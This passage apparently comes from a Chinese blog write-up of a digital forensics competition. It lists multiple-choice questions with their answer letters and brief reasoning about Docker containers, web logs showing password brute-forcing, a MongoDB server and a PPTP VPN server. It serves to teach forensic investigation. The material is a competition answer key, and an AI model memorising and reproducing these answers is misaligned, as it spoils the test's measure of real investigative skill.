tomcat: jessie-slim C. nginx: jessie-slim D. nginx: latest</code></li></ol><ol start="19"><li><p>上题所述容器节点占用的容器端口是什么?(<strong>B</strong>)</p><p>A.22 B.80 C.8091 D.未占用端口</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155706179.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155706179.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017155706179"></p><p><code>docker ps</code> 命令中在<code>PORTS</code>里面显示了两个端口,前面<code>0.0.0.0</code>就是主机,也就是自己,而后面的转发端口就对应着<code>docker</code>的端口</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160427657.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160427657.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017160427657"></p><blockquote><ol start="10"><li><p>该 <code>docker </code>应用的 <code>server </code>版本是多少?(<strong>B</strong>)</p><p><code>A.16.05.2 B.17.03.08 C.18.09.7 D.19.03.3</code></p></li></ol><ol start="11"><li><p>该 <code>docker</code> 应用中总共有多少容器节点?(<strong>A</strong>)</p><p><code>A.10 B.11 C.12 D.13</code></p></li></ol><ol start="12"><li><p>运行中的容器节点有多少?(<strong>D</strong>)</p><p><code>A.1 B.2 C.3 D.4</code></p></li></ol></blockquote><p>命令:<code>docker info</code>:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160217024.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160217024.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017160217024"></p><blockquote><ol start="20"><li><p>网站目录所在的容器内部路径为(格式:容器 ID:路径)(<strong>B</strong>)</p><p><code>A. d1085c1a8828:/home/ vue2-element-touzi-admin</code></p><p><code>B. 53766d68636f:/ home/ vue2-element-touzi-admin</code></p><p><code>C. 16fc160060c1:/var/www/ vue2-element-touzi-admin</code></p><p> <code>D. 15debb1824e6: /var/www/ vue2-element-touzi-admin</code></p></li></ol></blockquote><p>可以进三个开启的容器找一下:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017220356116.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017220356116.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017220356116"></p><blockquote><ol start="21"><li><p>网站目录所在的主机路径为下列选项中的哪个?(<strong>A</strong>)</p><p><code>A. /var/lib/docker/overlay2/cca977c8ca4a251023000285fbc8b4556636e1adc53cb012c84133a7b857abfc/diff/home/vue2-element-touzi-admin</code></p><p><code> B. /var/lib/docker/overlay2/fd27756120785ef656c9211b6147ef5f38d6a9811006d85359458f7fa8d45415/diff/home/vue2-element-touzi-admin</code></p><p><code> C. /var/lib/docker/overlay2/f405ba5e3f1f0e04a3585fbc95a47d13b4009dd9d599ac91015babebd5a5ff9b/diff/var/www/ vue2-element-touzi-admin</code></p><p><code> D. /var/lib/docker/overlay2/d42b9a02aa87386b137242f691cb3e6303c4c0f3441419efb17ff550fdf5de28/diff/var/www/ vue2-element-touzi-admin</code></p></li><li><p>网站日志的路径在哪?(格式:容器 ID:路径)(<strong>C</strong>)</p><pre><code>A. 53766d68636f:/etc/nginx/logs/jrweb.log B. 53766d68636f:/var/log/access.logC. 16fc160060c1:/etc/nginx/logs/jrweb.log D. 16fc160060c1:/var/log/access.log</code></pre></li></ol></blockquote><p>在取证大师里面搜索“投资”(“<code>jrweb</code>“):<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214438176.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214438176.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017214438176"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214531352.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214531352.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017214531352"></p><p>22题同21</p><blockquote><ol start="23"><li><p>案发当时,该服务器的原始 <code>IP</code> 地址是多少?(<strong>D</strong>)</p><p><code>A.192.168.160.89 B.192.168.184.100 C.192.168.120.111 D.192.168.184.128</code></p></li></ol></blockquote><p>可以看看上一个题的日志文件:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021111229033"></p><p>在这里明显能看到猜解密码的行为,所以这个时候就是“案发当时”,此时的<code>IP</code>地址就是<code>192.168.184.128:8091</code></p><blockquote><ol start="24"><li><p>在 <code>docker</code> 中,各容器节点和主机之间的网络连接模式是什么?(<strong>A</strong>)</p><p><code>A. bridge 模式 B. host 模式 C. container 模式 D.none 模式</code></p></li></ol></blockquote><blockquote><p><code>$ docker inspect ID</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021103821517.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021103821517.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021103821517"></p><blockquote><ol start="25"><li><p>当我们想将网站重构好时,访问网站时,web 应用在其中承担什么样的工作?(<strong>B</strong>) </p><p>A.运行网站 B.转发 C.反向代理 D.负载均衡</p></li></ol></blockquote><blockquote><ol start="26"><li><p>从网站日志中,我们可以看到嫌疑人入侵服务器所使用的 IP 是(<strong>C</strong>)</p><p><code>A.192.168.184.1 B.192.168.160.89 C.192.168.184.133 D.192.168.160.169</code></p></li></ol></blockquote><p>在上面的日志里面,我们明显可以看到用户<code>192.168.184.133</code>在爆破<code>admin</code>用户的<code>password</code>:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021111229033"></p><blockquote><ol start="27"><li><p>网站目录中网站的主配置文件是哪一个?(相对路径)(<strong>C</strong>)</p><p><code>A./config/index.js B./server/api.js C./server/index.js D./src/main.js</code></p></li><li><p>该网站使用的是什么数据库?(<strong>B</strong>)</p><p><code>A.mysql B.oracle C.mongodb D.redis</code></p></li></ol></blockquote><p>一般来说,项目都是从<code>github</code>上面<code>clone</code>下来的,所以根目录应该在<code>home</code>文件夹下,查看<code>README.md</code>文件,发现:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021113125958.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021113125958.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021113125958"></p><p>我们再分别查看27中的四个选项,只有<code>/server/index.js</code>有各种引入,所以这个应该是主配置文件(误×</p><p>这里他说的是<code>node js</code>的配置文件,所以应该在<code>/server</code>目录下,对比三个文件,明显就是<code>C</code>选项</p><blockquote><ol start="29"><li><p>所使用数据库的端口是多少?(<strong>D</strong>)</p><p><code>A.1521 B.3306 C.6379 D.27017</code></p></li><li><p>数据库所在服务器 IP 是多少?(<strong>D</strong>) </p><p><code>A.192.168.160.131 B.192.168.184.131 C.192.168.160.169 D.192.168.184.129</code></p></li><li><p>数据库的用户名是什么?(<strong>A</strong>)</p><p><code> A. root B. tougu C. admin D. goose</code></p></li><li><p>数据库的密码是什么?(<strong>D</strong>)</p><p><code> A.123456 B. admin C. goose D. root</code></p></li><li><p>该网站所使用的数据库库名是什么?(<strong>B</strong>)</p><p><code>A. root B. tougu C. admin D. goose</code></p></li></ol></blockquote><p>查看<code>db.js</code>文件:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021202137166.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021202137166.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021202137166"></p><blockquote><ol start="34"><li><p>在案发时,黑客对该服务器某个文件/目录进行了加密,请问是哪个文件/目录?(<strong>A</strong>)</p><p><code>A. ~/.bash_history B. /var/log/ C. /etc/ssh/sshd_config D. ~/runit-agent.txt</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021203854420.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021203854420.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021203854420"></p><h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part 2"></a>Part 2</h2><p>你获得了该 P2P 理财网站数据库服务器硬盘镜像文件“检材 2.E01”,根据这个镜像文件,回答下列问题:</p><blockquote><ol start="35"><li><p>该数据库服务器使用数据库的安装路径在哪?(<strong>D</strong>)</p><p><code>A. /etc/mysql/ B. /home/redis/ C. /etc/mongo/ D. /var/lib/mongo/</code></p></li><li><p>数据库的配置文件的路径?(<strong>C</strong>)</p><p><code>A. /var/lib/mongo/mongo.conf B. /var/lib/mongo/mongod.conf C. /etc/mongod.conf D. /home/redis/redis.conf</code></p></li><li><p>数据库的日志文件路径在哪里?(<strong>C</strong>)</p><p><code>A. /etc/redis.log B. /var/log/mongodb.log C. /var/log/mongodb/mongod.log D. /var/li/mongo/mongo.log</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021211840499.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021211840499.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021211840499"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021212314873.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021212314873.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021212314873"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021213822422.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021213822422.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021213822422"></p><p>顺手看看配置文件:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021214039425.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021214039425.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201021214039425"></p><blockquote><ol start="38"><li><p>该数据库的网站用户表名是什么?(<strong>B</strong>)</p><p><code>A. user B. users C. touzi D. licai</code></p></li><li><p>该数据库中网站用户表里的密码字段加密方式是(<strong>A</strong>)</p><p><code>A.未加密 B.双重 MD5 C.MD5 加 salt D.MD5</code></p></li><li><p>该用户表被做过什么样的修改?(<strong>B</strong>)</p><p>A.删除用户 B.修改用户密码 C.修改用户名 D.添加用户</p></li><li><p>嫌疑人对该数据库的哪个库进行了风险操作?(<strong>C</strong>)</p><p><code>A. licai B. touzi C. tougu D. admin</code></p></li><li><p>嫌疑人对上述数据库做了什么样的风险操作?(<strong>D</strong>)</p><p>A.修改库名 B.添加库 C.查询库 D.删除库</p></li></ol></blockquote><p>因为读取用户的注册信息在前端,所以我们回到前端(检材1)来看看代码:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112114926679.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112114926679.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112114926679"></p><p>这里逻辑很清晰,没有对<code>data[0].password</code>进行解密,或者<code>password</code>进行加密操作,所以应该是“未加密”</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022185510697.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022185510697.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022185510697"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022192019619.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022192019619.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022192019619"></p><blockquote><ol start="43"><li><p>嫌疑人在哪个时间段内登陆数据库?(<strong>D</strong>)</p><p><code>A.18:03-18:48 B.18:05-18:45 C.18:01-18:50 D.18:05-18:32</code></p></li><li><p>嫌疑人在什么时间对数据库进行了 42 题所述的风险操作?(<strong>A</strong>)<br><code>A.18:09:37 B.18:09:40 C.18:09:44 D.18:09:50</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022195747946.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022195747946.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022195747946"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022201348763.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022201348763.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022201348763"></p><h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part 3"></a>Part 3</h2><p>经调查,你扣押获得了一台嫌疑人使用过的 VPN 服务器,并用服务器硬盘制作成“检材 3.E01” 镜像文件,根据该镜像文件,回答下列问题:</p><blockquote><ol start="45"><li><p>该服务器所使用的 VPN 软件,采用了什么协议(<strong>B</strong>)<br><code>A.L2TP B.PPTP C.IPSec D.NFS</code></p></li><li><p>该服务器的时区为(<strong>D</strong>)<br><code> A. Asia/ShangHai B. Asia/Tokyo C. Asia/Bangkok D. Asia/Dhaka</code></p></li><li><p>该服务器中对 VPN 软件配置的 option 的文件位置在哪里?(<strong>A</strong>)<br><code> A. /etc/ppp/options.pptpd B./var/lib/vpn/options.pptpd C./etc/ipsec/options.ipsecd D./etc/l2tp/options.l2tpd</code></p></li><li><p><code>VPN</code> 软件开启了写入客户端的连接与断开,请问写入的文件是哪个?(<strong>A</strong>)</p><p><code>A.wtmp B.btmp C.ftmp D.tmp</code></p></li><li><p><code>VPN</code> 软件客户端被分配的 IP 范围是(<strong>B</strong>)</p><p><code>A.192.168.184.1-192.168.184.11 B.192.168.184.12-192.168.184.18</code></p><p><code>C.192.168.184.19-192.168.184.26 D.192.168.184.27-192.168.184.35</code></p></li><li><p>由 <code>option</code> 文件可以知道,<code>option</code> 文件配置了 <code>VPN</code> 软件的日志路径为(<strong>D</strong>)<br><code> A./var/lib/logs/ B./etc/logs/ C./var/log/pptp/ D./var/log/</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215759201.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215759201.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201022215759201"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215925090.png" 